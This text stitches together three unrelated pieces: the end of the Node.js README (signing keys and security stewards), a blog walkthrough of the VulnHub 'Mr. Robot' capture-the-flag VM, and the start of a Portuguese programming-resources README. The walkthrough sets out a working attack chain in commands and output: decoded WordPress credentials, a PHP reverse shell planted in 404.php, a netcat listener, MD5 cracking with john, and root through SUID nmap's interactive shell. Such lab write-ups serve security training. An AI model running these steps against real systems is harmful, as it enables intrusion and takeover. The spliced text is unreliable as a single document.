`B9AE9905FFD7803F25714661B63B535A4C206CA9`
* **Gibson Fahnestock** <<gibfahn@gmail.com>>
`77984A986EBC2AA786BC0F66B01FBB92821C587A`
* **Isaac Z. Schlueter** <<i@izs.me>>
`93C7E9E91B49E432C2F75674B0A78B0A6C481CF6`
* **Italo A. Casas** <<me@italoacasas.com>>
`56730D5401028683275BD23C23EFEFE93C4CFFFE`
* **James M Snell** <<jasnell@keybase.io>>
`71DCFD284A79C3B38668286BC97EC7A07EDE3FC1`
* **Jeremiah Senkpiel** <<fishrock@keybase.io>>
`FD3A5288F042B6850C66B31F09FE44734EB7990E`
* **Juan José Arboleda** <<soyjuanarbol@gmail.com>>
`61FC681DFB92A079F1685E77973F295594EC4689`
* **Julien Gilli** <<jgilli@fastmail.fm>>
`114F43EE0176B71C7BC219DD50A3051F888C628D`
* **Rod Vagg** <<rod@vagg.org>>
`DD8F2338BAE7501E3DD5AC78C273792F7D83545D`
* **Ruben Bridgewater** <<ruben@bridgewater.de>>
`A48C2BEE680E841632CD4E44F07496B3EB3C1762`
* **Shelley Vohr** <<shelley.vohr@gmail.com>>
`B9E2F5981AA6E0CD28160D9FF13993A75599653C`
* **Timothy J Fontaine** <<tjfontaine@gmail.com>>
`7937DFD2AB06298B2293C3187D33FF9D0246406D`
</details>
### Security release stewards
When possible, the commitment to take slots in the
security release steward rotation is made by companies in order
to ensure individuals who act as security stewards have the
support and recognition from their employer to be able to
prioritize security releases. Security release stewards manage security
releases on a rotation basis as outlined in the
[security release process](./doc/contributing/security-release-process.md).
* Datadog
* [bengl](https://github.com/bengl) -
**Bryan English** <<bryan@bryanenglish.com>> (he/him)
* NearForm
* [RafaelGSS](https://github.com/RafaelGSS) -
**Rafael Gonzaga** <<rafael.nunu@hotmail.com>> (he/him)
* NodeSource
* [juanarbol](https://github.com/juanarbol) -
**Juan José Arboleda** <<soyjuanarbol@gmail.com>> (he/him)
* Platformatic
* [mcollina](https://github.com/mcollina) -
**Matteo Collina** <<matteo.collina@gmail.com>> (he/him)
* Red Hat and IBM
* [joesepi](https://github.com/joesepi) -
**Joe Sepi** <<joesepi@ibm.com>> (he/him)
* [mhdawson](https://github.com/mhdawson) -
**Michael Dawson** <<midawson@redhat.com>> (he/him)
## License
Node.js is available under the
[MIT license](https://opensource.org/licenses/MIT). Node.js also includes
external libraries that are available under a variety of licenses. See
[LICENSE](https://github.com/nodejs/node/blob/HEAD/LICENSE) for the full
license text.
[Code of Conduct]: https://github.com/nodejs/admin/blob/HEAD/CODE_OF_CONDUCT.md
[Contributing to the project]: CONTRIBUTING.md
[Node.js website]: https://nodejs.org/
[OpenJS Foundation]: https://openjsf.org/
[Strategic initiatives]: doc/contributing/strategic-initiatives.md
[Technical values and prioritization]: doc/contributing/technical-values.md
[Working Groups]: https://github.com/nodejs/TSC/blob/HEAD/WORKING_GROUPS.md
|
<header class="post-header">
<h1 class="post-title" itemprop="name headline">VulnHub: Mr. Robot</h1>
<p class="post-meta">
<time datetime="2017-10-11T18:37:00+00:00" itemprop="datePublished"></header>
<div class="post-content" itemprop="articleBody">
<p><strong>Hello friend.</strong></p>
<p>In celebration of <a href="https://en.wikipedia.org/wiki/Mr._Robot">Mr Robot Season 3</a> premiering <em>tonight</em>, today’s <a href="https://vulnhub.com">Vulnhub</a> box will be “Mr Robot”!</p>
<p>For those who are just joining us, Vulnhub provides intentionally-vulnerable virtual machines to help anyone gain practical hands-on experience in information security and network administration. It’s great practice for working on penetrating vulnerable hosts. This host is themed after the hit hacker TV series of the same name.</p>
<p>From the description:</p>
<blockquote>
<p>This VM has three keys hidden in different locations. Your goal is to find all three. Each key is progressively difficult to find.</p>
</blockquote>
<p>Sounds fun! Let’s get started.</p>
<h1 id="enumeration">Enumeration</h1>
<p>You should know the drill by now. Our first volley is usually an nmap scan to see what we’re dealing with:</p>
<div class="highlighter-rouge"><pre class="highlight"><code>root@kali:~# nmap 192.168.128.140
Starting Nmap 7.60 ( https://nmap.org ) at 2017-10-11 10:57 CDT
Nmap scan report for 192.168.128.140
Host is up (0.00053s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE
22/tcp closed ssh
80/tcp open http
443/tcp open https
MAC Address: 00:0C:29:72:C3:7A (VMware)
Nmap done: 1 IP address (1 host up) scanned in 28.36 seconds
</code></pre>
</div>
<p>I browse to the webserver, and am greeted with a really awesome virtual terminal. It logs in to itself, and then displays the following message:</p>
<div class="highlighter-rouge"><pre class="highlight"><code>11:01 <mr. robot> Hello friend. If you've come, you've come for a reason.
You may not be able to explain it yet, but there's a part of you that's
exhausted with this world... a world that decides where you work, who you
see, and how you empty and fill your depressing bank account. Even the
Internet connection you are using to read this is costing you, slowly
chipping away at your existence. There are things you want to say.
Soon I will give you a voice. Today your education begins.
Commands:
prepare
fsociety
inform
question
wakeup
join
root@fsociety:~#
</code></pre>
</div>
<p>Wow… Ok. Are there Agents coming for me? Do I need to slip out the window onto the scaffolding?</p>
<p>I try a few of the commands while I wait for <code class="highlighter-rouge">nikto</code> and <code class="highlighter-rouge">dirb</code> to complete. Most of them just display sloganry or images related to the show. Which is cool, but not helpful to our goal of rooting the box. At this stage I decide to continue enumerating the host rather than dive into analyzing this part of the app. There will be time for that later.</p>
<p>Next I check the ‘robots.txt’ file for the host:</p>
<div class="highlighter-rouge"><pre class="highlight"><code>root@kali:~# curl 'http://192.168.128.140/robots.txt'
User-agent: *
fsocity.dic
key-1-of-3.txt
</code></pre>
</div>
<p>There’s key number one!</p>
<div class="highlighter-rouge"><pre class="highlight"><code>root@kali:~# curl 'http://192.168.128.140/key-1-of-3.txt'
073403c8a58a1f80d943455fb30724b9
</code></pre>
</div>
<p>The <code class="highlighter-rouge">fsocity.dic</code> [sic] file is a dictionary file, which makes me suspect brute-forcing will be a component of this box.</p>
<p>By this time nikto has completed and reveals some interesting details:</p>
<div class="highlighter-rouge"><pre class="highlight"><code>root@kali:~# nikto -h 192.168.128.140
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.128.140
+ Target Hostname: 192.168.128.140
+ Target Port: 80
+ Start Time: 2017-10-10 19:45:44 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Retrieved x-powered-by header: PHP/5.5.29
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server leaks inodes via ETags, header found with file /robots.txt, fields: 0x29 0x52467010ef8ad
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.html, index.php
+ OSVDB-3092: /admin/: This might be interesting...
+ OSVDB-3092: /readme: This might be interesting...
+ Uncommon header 'link' found, with contents: <http://192.168.128.140/?p=23>; rel=shortlink
+ /wp-links-opml.php: This WordPress script reveals the installed version.
+ OSVDB-3092: /license.txt: License file found may identify site software.
+ /admin/index.html: Admin login page/section found.
+ Cookie wordpress_test_cookie created without the httponly flag
+ /wp-login/: Admin login page/section found.
+ /wordpress/: A Wordpress installation was found.
+ /wp-admin/wp-login.php: Wordpress login found
+ /blog/wp-login.php: Wordpress login found
+ /wp-login.php: Wordpress login found
+ 7536 requests: 0 error(s) and 18 item(s) reported on remote host
+ End Time: 2017-10-10 19:51:13 (GMT-5) (329 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
</code></pre>
</div>
<p>Neat. Some of these exposed dirs are not obviously helpful. See for example “/readme”:</p>
<div class="highlighter-rouge"><pre class="highlight"><code>root@kali:~# curl http://192.168.128.140/readme.html
I like where you head is at. However I'm not going to help you.
</code></pre>
</div>
<p>However, looking at /license:</p>
<div class="highlighter-rouge"><pre class="highlight"><code>what you do just pull code from Rapid9 or some s@#% since when did you become a script kitty?
do you want a password or something?
ZWxsaW90OkVSMjgtMDY1Mgo=
</code></pre>
</div>
<p>A “script kitty”?! Now that’s below the belt. Anyway, the base64 decodes to what looks like a credential set:</p>
<div class="highlighter-rouge"><pre class="highlight"><code>root@kali:~# echo 'ZWxsaW90OkVSMjgtMDY1Mgo=' | base64 -d
elliot:ER28-0652
</code></pre>
</div>
<p>I can’t be sure but I will guess these may be credentials to the WordPress site.</p>
<p>I run WPScan against the site to test for vulnerabilities and while I attempt to log in with the discovered cred pair.</p>
<div class="highlighter-rouge"><pre class="highlight"><code>root@kali:~# wpscan --url http://192.168.128.140 --enumerate
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 2.9.3
Sponsored by Sucuri - https://sucuri.net
@_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_
_______________________________________________________________
[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o [A]bort, default: [N]y
[i] Updating the Database ...
[i] Update completed.
[+] URL: http://192.168.128.140/
[+] Started: Tue Oct 10 18:31:01 2017
[...]
</code></pre>
</div>
<p>The discovered version of WordPress contains <a href="https://wpvulndb.com/wordpresses/431">multiple vulnerabilities</a> and the site is using many vulnerable plug-ins. This is irrelevant at this point to our goal, however, because we are able to sign into WordPress with <code class="highlighter-rouge">elliot:ER28-0652</code>!</p>
<h1 id="gaining-a-foothold">Gaining a Foothold</h1>
<p>Once authenticated to WordPress I upload a <a href="http://pentestmonkey.net/tools/web-shells/php-reverse-shell">php reverse shell</a>. I go to the Dashboard -> Appearance -> Editor. From here I can paste my code into any of the files. The first in the list is the default 404.php file, so it will be our victim today. I paste the code in, click “Update File”, and then simply browse to the resource with Firefox.</p>
<p>Then I catch my reverse shell with netcat:</p>
<div class="highlighter-rouge"><pre class="highlight"><code>root@kali:~# nc -lp 80
Linux linux 3.13.0-55-generic #94-Ubuntu SMP Thu Jun 18 00:27:10 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
00:30:53 up 3:00, 0 users, load average: 0.00, 0.01, 0.08
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=1(daemon) gid=1(daemon) groups=1(daemon)
/bin/sh: 0: can't access tty; job control turned off
$ python -c 'import pty;pty.spawn("/bin/bash");'
daemon@linux:/$
</code></pre>
</div>
<p>That wasn’t so bad! Now to get the rest of the flags, and get to ROOT.</p>
<h1 id="privilege-escalation">Privilege Escalation</h1>
<p>I examine the filesystem and find a home directory for a user named “robot”</p>
<div class="highlighter-rouge"><pre class="highlight"><code>daemon@linux:/$ ls -l /home
ls -l /home
total 4
drwxr-xr-x 2 root root 4096 Nov 13 2015 robot
</code></pre>
</div>
<p>I explore the directory a little further and find some interesting files:</p>
<div class="highlighter-rouge"><pre class="highlight"><code>daemon@linux:/$ ls -la /home/robot
ls -la /home/robot
total 16
drwxr-xr-x 2 root root 4096 Nov 13 2015 .
drwxr-xr-x 3 root root 4096 Nov 13 2015 ..
-r-------- 1 robot robot 33 Nov 13 2015 key-2-of-3.txt
-rw-r--r-- 1 robot robot 39 Nov 13 2015 password.raw-md5
</code></pre>
</div>
<p>Hmm a raw-md5 hash?</p>
<div class="highlighter-rouge"><pre class="highlight"><code>daemon@linux:/$ cat /home/robot/password.raw-md5
cat /home/robot/password.raw-md5
robot:c3fcd3d76192e4007dfb496cca67e13b
</code></pre>
</div>
<p>MD5 hashing algorithm <a href="https://en.wikipedia.org/wiki/MD5#Security">has been found to have multiple vulnerabilities</a>, so it should be easy to crack. Let’s try it with john:</p>
<div class="highlighter-rouge"><pre class="highlight"><code>root@kali:~# echo 'c3fcd3d76192e4007dfb496cca67e13b' > hash
root@kali:~# john --format=Raw-MD5 --wordlist=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-MD5 [MD5 128/128 SSE2 4x3])
Press 'q' or Ctrl-C to abort, almost any other key for status
abcdefghijklmnopqrstuvwxyz (?)
1g 0:00:00:00 DONE (2017-10-10 19:52) 16.66g/s 673400p/s 673400c/s 673400C/s abygail..TERRELL
Use the "--show" option to display all of the cracked passwords reliably
Session completed
</code></pre>
</div>
<p>Excellent!</p>
<p>If you struggle with john like I did, there is always the ooooold obscure hacker trick called “Google” which will unmask many, many MD5s and other hashes.</p>
<p>I use the uncovered password to <code class="highlighter-rouge">su</code> to user “robot” and snag the key:</p>
<div class="highlighter-rouge"><pre class="highlight"><code>daemon@linux:/$ su - robot
su - robot
Password: abcdefghijklmnopqrstuvwxyz
$ id
id
uid=1002(robot) gid=1002(robot) groups=1002(robot)
$ cat /home/robot/key-2-of-3.txt
cat /home/robot/key-2-of-3.txt
822c73956184f694993bede3eb39f959
</code></pre>
</div>
<p>Now let’s get some root.</p>
<h1 id="getting-to-root">Getting to root</h1>
<p>I enumerate the filesystem some more, digging around for SUID files:</p>
<div class="highlighter-rouge"><pre class="highlight"><code>robot@linux:~$ find / -xdev -user root -perm -4000 -type f 2>/dev/null
find / -xdev -user root -perm -4000 -type f 2>/dev/null
/bin/ping
/bin/umount
/bin/mount
/bin/ping6
/bin/su
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/local/bin/nmap
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
/usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
/usr/lib/pt_chown
</code></pre>
</div>
<p>Hmm, interesting. The <code class="highlighter-rouge">nmap</code> program is SUID root:</p>
<div class="highlighter-rouge"><pre class="highlight"><code>robot@linux:~$ ls -l /usr/local/bin/nmap
ls -l /usr/local/bin/nmap
-rwsr-xr-x 1 root root 504736 Nov 13 2015 /usr/local/bin/nmap
</code></pre>
</div>
<p>Even worse, it is a grossly outdated version:</p>
<div class="highlighter-rouge"><pre class="highlight"><code>robot@linux:~$ /usr/local/bin/nmap --version
/usr/local/bin/nmap --version
nmap version 3.81 ( http://www.insecure.org/nmap/ )
</code></pre>
</div>
<p>Specifically, it is a grossly outdated version which supports the <code class="highlighter-rouge">--interactive</code> flag. This allows us to drop into a kind of “nmap shell”, which we can then pivot into a real command shell:</p>
<div class="highlighter-rouge"><pre class="highlight"><code>robot@linux:~$ nmap --interactive
nmap --interactive
Starting nmap V. 3.81 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !sh
!sh
$ id
id
uid=1002(robot) gid=1002(robot) euid=0(root) groups=0(root),1002(robot)
$ cat /root/key-3-of-3.txt
cat /root/key-3-of-3.txt
04787ddef27c3dee1ee161b21670b4e4
</code></pre>
</div>
<p>Fantastic.</p>
<h1 id="final-thoughts">Final Thoughts</h1>
<p>This was a really cool box and definitely got me into the mood to watch some Mr. Robot tonight!</p>
<p>The creators stated that there are multiple ways to own it, so this explains why some things (such as the brute force dict file) ended up not getting used. I can tell they put a lot of effort into this machine. I spent a little more time poking around the box after rooting it and can confirm there are other ways to get it. If you want to know more you’ll have to download it and find them for yourself. ;)</p>
<p>Thanks for reading, and stay tuned for some posts on some personal projects coming up in the VERY near future.</p>
<p>All the best,</p>
|
<p align="center">
<a href="https://github.com/arthurspk/guiadevbrasil">
<img src="./images/guia.png" alt="Guia Extenso de Programação" width="160" height="160">
</a>
<h1 align="center">Guia Extenso de Programação</h1>
</p>
## :dart: O guia para alavancar a sua carreira
> Abaixo você encontrará conteúdos para te guiar e ajudar a se tornar um desenvolvedor ou se especializar em qualquer área de TI. Caso você já atue como desenvolvedor ou em outra área, confira o repositório para descobrir novas ferramentas para o seu dia-a-dia, caminhos possíveis e as tecnologias para incorporar na sua stack com foco em se tornar um profissional atualizado e diferenciado em front-end, back-end, dentre outras.
<sub> <strong>Siga nas redes sociais para acompanhar mais conteúdos: </strong> <br>
[<img src = "https://img.shields.io/badge/GitHub-100000?style=for-the-badge&logo=github&logoColor=white">](https://github.com/arthurspk)
[<img src = "https://img.shields.io/badge/Facebook-1877F2?style=for-the-badge&logo=facebook&logoColor=white">](https://www.facebook.com/seixasqlc/)
[<img src="https://img.shields.io/badge/linkedin-%230077B5.svg?&style=for-the-badge&logo=linkedin&logoColor=white" />](https://www.linkedin.com/in/arthurspk/)
[<img src = "https://img.shields.io/badge/Twitter-1DA1F2?style=for-the-badge&logo=twitter&logoColor=white">](https://twitter.com/manotoquinho)
[![Discord Badge](https://img.shields.io/badge/Discord-5865F2?style=for-the-badge&logo=discord&logoColor=white)](https://discord.gg/NbMQUPjHz7)
[<img src = "https://img.shields.io/badge/instagram-%23E4405F.svg?&style=for-the-badge&logo=instagram&logoColor=white">](https://www.instagram.com/guiadevbrasil/)
[![Youtube Badge](https://img.shields.io/badge/YouTube-FF0000?style=for-the-badge&logo=youtube&logoColor=white)](https://www.youtube.com/channel/UCzmXzz_VR0Li8-YOvWN_t3g)
</sub>
## 💌 Doações
> Olá! Se você está lendo isso, é porque provavelmente já conhece o meu repositório no GitHub, que oferece conteúdo gratuito para ajudar desenvolvedores a aprimorarem suas habilidades. E se você está aqui, talvez esteja considerando contribuir com uma doação para apoiar a continuação do projeto.
- [Clique aqui para realizar uma doação! 💓](https://beacons.ai/doacoesguiadev)
> Se você quiser contribuir, existem várias opções disponíveis, incluindo PayPal, PagSeguro, Mercado Pago, Buy Me A Coffe, Pic Pay e Pix. Qualquer doação, por menor que seja, é extremamente bem-vinda e será usada com responsabilidade e transparência. Obrigado por considerar apoiar meu projeto! Juntos, podemos continuar a compartilhar conhecimento e ajudar a criar uma comunidade de desenvolvedores mais forte e colaborativa.
## :closed_book: E-Book
> Este repositório é um projeto gratuito para a comunidade de desenvolvedores. Você pode me ajudar comprando o e-book "e-Front" se estiver interessado em aprender ou melhorar suas habilidades de desenvolvimento front-end. O e-book é completo e cobre tecnologias essenciais como HTML, CSS, JavaScript, React, TypeScript e mais. O valor é simbólico e sua compra me ajuda a produzir e fornecer mais conteúdo gratuito para a comunidade. Adquira agora e comece sua jornada no desenvolvimento front-end.
- eFront - Estudando Desenvolvimento Front-end do Zero. [Clique aqui para comprar](https://hotm.art/cSMObU)
## ⚠️ Aviso importante
> Antes de tudo você pode me ajudar e colaborar, deu bastante trabalho fazer esse repositório e organizar para fazer seu estudo ou trabalho melhor, portanto você pode me ajudar das seguintes maneiras:
- Me siga no [Github](https://github.com/arthurspk)
- Acesse as redes sociais do [Guia Dev Brasil](https://beacons.ai/guiadevbrasil/)
- Mande feedbacks no [LinkedIn](https://www.linkedin.com/in/arthurspk/)
## 💡 Nossa proposta
> A proposta deste guia é dar uma ideia sobre o atual panorama e guiá-lo se você estiver confuso sobre qual será o seu próximo aprendizado, sem influenciar você a seguir os 'hypes' e 'trends' do momento. Acreditamos que com um maior conhecimento das diferentes estruturas e soluções disponíveis poderá escolher a ferramenta que melhor se aplica às suas demandas. E lembre-se, 'hypes' e 'trends' nem sempre são as melhores opções.
## :beginner: Para quem está começando agora
> Não se assuste com a quantidade de conteúdo apresentado neste guia. Acredito que quem está começando pode usá-lo não como um objetivo, mas como um apoio para os estudos. <b>Neste momento, dê enfoque no que te dá produtividade e o restante marque como <i>Ver depois</i></b>. Ao passo que seu conhecimento se torna mais amplo, a tendência é este guia fazer mais sentido e ficar fácil de ser assimilado. Bons estudos e entre em contato sempre que quiser! :punch:
## 🚨 Colabore
- Abra Pull Requests com atualizações
- Discuta ideias em Issues
- Compartilhe o repositório com a sua comunidade
## 🌍 Tradução
> Se você deseja acompanhar esse repositório em outro idioma que não seja o Português Brasileiro, você pode optar pelas escolhas de idiomas abaixo, você também pode colaborar com a tradução para outros idiomas e a correções de possíveis erros ortográficos, a comunidade agradece.
<img src = "https://i.imgur.com/lpP9V2p.png" alt="Guia Extenso de Programação" width="16" height="15">・<b>English — </b> [Click Here](https://github.com/arthurspk/guiadevbrasil)<br>
<img src = "https://i.imgur.com/GprSvJe.png" alt="Guia Extenso de Programação" width="16" height="15">・<b>Spanish — </b> [Click Here](https://github.com/arthurspk/guiadevbrasil)<br>
<img src = "https://i.imgur.com/4DX1q8l.png" alt="Guia Extenso de Programação" width="16" height="15">・<b>Chinese — </b> [Click Here](https://github.com/arthurspk/guiadevbrasil)<br>
<img src = "https://i.imgur.com/6MnAOMg.png" alt="Guia Extenso de Programação" width="16" height="15">・<b>Hindi — </b> [Click Here](https://github.com/arthurspk/guiadevbrasil)<br>
<img src = "https://i.imgur.com/8t4zBFd.png" alt="Guia Extenso de Programação" width="16" height="15">・<b>Arabic — </b> [Click Here](https://github.com/arthurspk/guiadevbrasil)<br>
<img src = "https://i.imgur.com/iOdzTmD.png" alt="Guia Extenso de Programação" width="16" height="15">・<b>French — </b> [Click Here](https://github.com/arthurspk/guiadevbrasil)<br>
<img src = "https://i.imgur.com/PILSgAO.png" alt="Guia Extenso de Programação" width="16" height="15">・<b>Italian — </b> [Click Here](https://github.com/arthurspk/guiadevbrasil)<br>
<img src = "https://i.imgur.com/0lZOSiy.png" alt="Guia Extenso de Programação" width="16" height="15">・<b>Korean — </b> [Click Here](https://github.com/arthurspk/guiadevbrasil)<br>
<img src = "https://i.imgur.com/3S5pFlQ.png" alt="Guia Extenso de Programação" width="16" height="15">・<b>Russian — </b> [Click Here](https://github.com/arthurspk/guiadevbrasil)<br>
<img src = "https://i.imgur.com/i6DQjZa.png" alt="Guia Extenso de Programação" width="16" height="15">・<b>German — </b> [Click Here](https://github.com/arthurspk/guiadevbrasil)<br>
<img src = "https://i.imgur.com/wWRZMNK.png" alt="Guia Extenso de Programação" width="16" height="15">・<b>Japanese — </b> [Click Here](https://github.com/arthurspk/guiadevbrasil)<br>
## 📚 ÍNDICE
[🔧 Ferramentas para tradução de conteúdo](#-ferramentas-para-tradução-de-conteúdo) <br>
[👨🏫 Sites para estudar programação](#-sites-para-estudar-programação) <br>
[🎨 Sites para desenvolvedor front-end](#-sites-para-desenvolvedor-front-end) <br>
[🎮 Sites para aprender a programar jogando](#-sites-para-aprender-a-programar-jogando) <br>
[✨ Templates HTML gratuitos](#-templates-html-gratuitos) <br>
[🎯 Sites para aprender ou treinar CSS](#-sites-para-aprender-ou-treinar-css) <br>
[⏰ Geradores de CSS](#-geradores-de-css) <br>
[🔎 Sites para buscar vagas remotas](#-sites-para-buscar-vagas-remotas) <br>
[🔧 Ferramentas de desenvolvimento](#-ferramentas-de-desenvolvimento) <br>
[🗂 Gerenciamento de projetos](#-gerenciamento-de-projetos) <br>
[📝 IDEs e editores de código](#-ides-e-editores-de-código) <br>
[🖌 Design Front-end](#-design-front-end) <br>
[🔤 Linguagens de programação](#-linguagens-de-programação) <br>
[📕 Guia de Estilo](#-guia-de-estilo) <br>
[📁 Desafios](#-desafios) <br>
[🛠️ Ferramentas para desenvolvedores WEB](#-ferramentas-para-desenvolvedores-web) <br>
[⚒️ Ferramentas para buscar projetos open source](#-ferramentas-para-buscar-projetos-open-source) <br>
[🐧 Melhores distros linux para programadores](#-melhores-distros-linux-para-programadores) <br>
[🔗 Bibliotecas JavaScript](#-bibliotecas-javascript) <br>
[⚙️ 9 Ferramentas que todo DEV precisa conhecer](#-9-ferramentas-que-todo-dev-precisa-conhecer) <br>
[🎭 Sites para praticar UI/UX](#-sites-para-praticar-uiux) <br>
[☁ Ferramentas para hospedar seu site](#-ferramentas-para-hospedar-seu-site) <br>
[🌌 Sites para inspirar o seu desenvolvimento](#-sites-para-inspirar-o-seu-desenvolvimento) <br>
[📮 Banco de imagens gratuitas](#-banco-de-imagens-gratuitas) <br>
[👔 Aumentando o network](#-aumentando-o-network) <br>
[🎠 Sites para baixar e encontrar fontes](#-sites-para-baixar-e-encontrar-fontes) <br>
[🧵 Sites de paletas de cores](#-sites-de-paletas-de-cores) <br>
[🎇 Lista de ilustrações](#-lista-de-ilustrações) <br>
[🎆 Sites de icones](#-sites-de-icones) <br>
[🎥 Canais do youtube com conteúdo grautito](#-canais-do-youtube-com-conteúdo-gratuito) <br>
[🔓 Pentest](#-pentest) <br>
[🎙 Blogs e Podcasts](#-blogs-e-podcasts) <br>
[💼 Business](#-business) <br>
[🧭 Web Developer Roadmap](#-web-developer-roadmap) <br>
[🔩 Extensões para o seu navegador](#-extensões-para-o-seu-navegador) <br>
[📚 Recomendação de livros](#-recomendação-de-livros) <br>
[📱 Apps para praticar programação](#-apps-para-praticar-programação) <br>
[📘 Sites para treinar projetos front-end](#-sites-para-treinar-projetos-front-end) <br>
[📗 Sites para treinar projetos back-end](#-sites-para-treinar-projetos-back-end) <br>
[📙 Sites para treinar projetos mobile](#-sites-para-treinar-projetos-mobile) <br>
[🗃️ Ideias para projeto](#-ideias-para-projeto) <br>
[🦓 Sites e cursos para aprender Java](#-sites-e-cursos-para-aprender-java) <br>
[🐴 Sites e cursos para aprender JavaScript](#-sites-e-cursos-para-aprender-javascript) <br>
[🐓 Sites e cursos para aprender HTML](#-sites-e-cursos-para-aprender-html) <br>
[🦄 Sites e cursos para aprender CSS](#-sites-e-cursos-para-aprender-css) <br>
[🐍 Sites e cursos para aprender Python](#-sites-e-cursos-para-aprender-python) <br>
[🐘 Sites e cursos para aprender PHP](#-sites-e-cursos-para-aprender-php) <br>
[🦚 Sites e cursos para aprender C#](#-sites-e-cursos-para-aprender-c) <br>
[🦉 Sites e cursos para aprender C](#-sites-e-cursos-para-aprender-c-1) <br>
[🐸 Sites e cursos para aprender C++](#-sites-e-cursos-para-aprender-c-2) <br>
[🦉 Sites e cursos para aprender Camunda](#-sites-e-cursos-para-aprender-camunda) <br>
[🐶 Sites e cursos para aprender Kotlin](#-sites-e-cursos-para-aprender-kotlin) <br>
[🦊 Sites e cursos para aprender Swift](#-sites-e-cursos-para-aprender-swift) <br>
[🐺 Sites e cursos para aprender Go](#-sites-e-cursos-para-aprender-go) <br>
[🐦 Sites e cursos para aprender Ruby](#-sites-e-cursos-para-aprender-ruby) <br>
[💧 Sites e cursos para aprender Elixir](#-sites-e-cursos-para-aprender-elixir) <br>
[🐷 Sites e cursos para aprender React](#-sites-e-cursos-para-aprender-react) <br>
[🐼 Sites e cursos para aprender React Native](#-sites-e-cursos-para-aprender-react-native) <br>
[🐯 Sites e cursos para aprender Angular](#-sites-e-cursos-para-aprender-angular) <br>
[🐞 Sites e cursos para aprender Vue](#-sites-e-cursos-para-aprender-vue) <br>
[🦂 Sites e cursos para aprender Svelte](#-sites-e-cursos-para-aprender-svelte) <br>
[🦞 Sites e cursos para aprender Flutter](#-sites-e-cursos-para-aprender-flutter) <br>
[🐹 Sites e cursos para aprender jQuery](#-sites-e-cursos-para-aprender-jquery) <br>
[🐢 Sites e cursos para aprender Less](#-sites-e-cursos-para-aprender-less) <br>
[🐱 Sites e cursos para aprender Sass](#-sites-e-cursos-para-aprender-sass) <br>
[🐰 Sites e cursos para aprender Bootstrap](#-sites-e-cursos-para-aprender-bootstrap) <br>
[🐤 Sites e cursos para aprender MySQL](#%EF%B8%8F-sites-e-cursos-para-aprender-mysql) <br>
[🐮 Sites e cursos para aprender Git e Github](#-sites-e-cursos-para-aprender-git-e-github) <br>
[🐒 Sites e cursos para aprender TypeScript](#-sites-e-cursos-para-aprender-typescript) <br>
[🐌 Sites e cursos para aprender Node.js](#-sites-e-cursos-para-aprender-nodejs) <br>
[🦌 Sites e cursos para aprender Next.js](#-sites-e-cursos-para-aprender-nextjs) <br>
[🦘 Sites e cursos para aprender Assembly](#-sites-e-cursos-para-aprender-assembly) <br>
[🦒 Sites e cursos para aprender Lua](#-sites-e-cursos-para-aprender-lua) <br>
[🐫 Sites e cursos para aprender Perl](#-sites-e-cursos-para-aprender-perl) <br>
[🐧 Sites e cursos para aprender Linux](#-sites-e-cursos-para-aprender-linux) <br>
[🦥 Sites e cursos para aprender Ionic](#-sites-e-cursos-para-aprender-ionic) <br>
[🦦 Sites e cursos para aprender Jira](#-sites-e-cursos-para-aprender-jira) <br>
[🐭 Sites e cursos para aprender Rust](#-sites-e-cursos-para-aprender-rust) <br>
[🐁 Sites e cursos para aprender Scala](#-sites-e-cursos-para-aprender-scala) <br>
[🦝 Sites e cursos para aprender Nuxt.js](#-sites-e-cursos-para-aprender-nuxtjs) <br>
[🦎 Sites e cursos para aprender Gulp](#-sites-e-cursos-para-aprender-gulp) <br>
[🐅 Sites e cursos para aprender MongoDB](#-sites-e-cursos-para-aprender-mongodb) <br>
[🦩 Sites e cursos para aprender GraphQL](#-sites-e-cursos-para-aprender-graphql) <br>
[🦙 Sites e cursos para aprender Cassandra](#-sites-e-cursos-para-aprender-cassandra) <br>
[🦛 Sites e cursos para aprender SQL Server](#-sites-e-cursos-para-aprender-sql-server) <br>
[🐐 Sites e cursos para aprender Postgree SQL](#-sites-e-cursos-para-aprender-postgree-sql) <br>
[🐑 Sites e cursos para aprender Delphi](#-sites-e-cursos-para-aprender-delphi) <br>
[🐊 Sites e cursos para aprender Wordpress](#-sites-e-cursos-para-aprender-wordpress) <br>
[🐳 Sites e cursos para aprender Docker](#-sites-e-cursos-para-aprender-docker) <br>
[🦜 Sites e cursos para aprender Kubernets](#-sites-e-cursos-para-aprender-kubernets) <br>
[🐆 Sites e cursos para aprender Nest](#-sites-e-cursos-para-aprender-nest) <br>
[🐿 Sites e cursos para aprender Laravel](#-sites-e-cursos-para-aprender-laravel) <br>
[🐃 Sites e cursos para aprender AWS](#-sites-e-cursos-para-aprender-aws) <br>
[🐬 Sites e cursos para aprender Google Cloud](#-sites-e-cursos-para-aprender-google-cloud) <br>
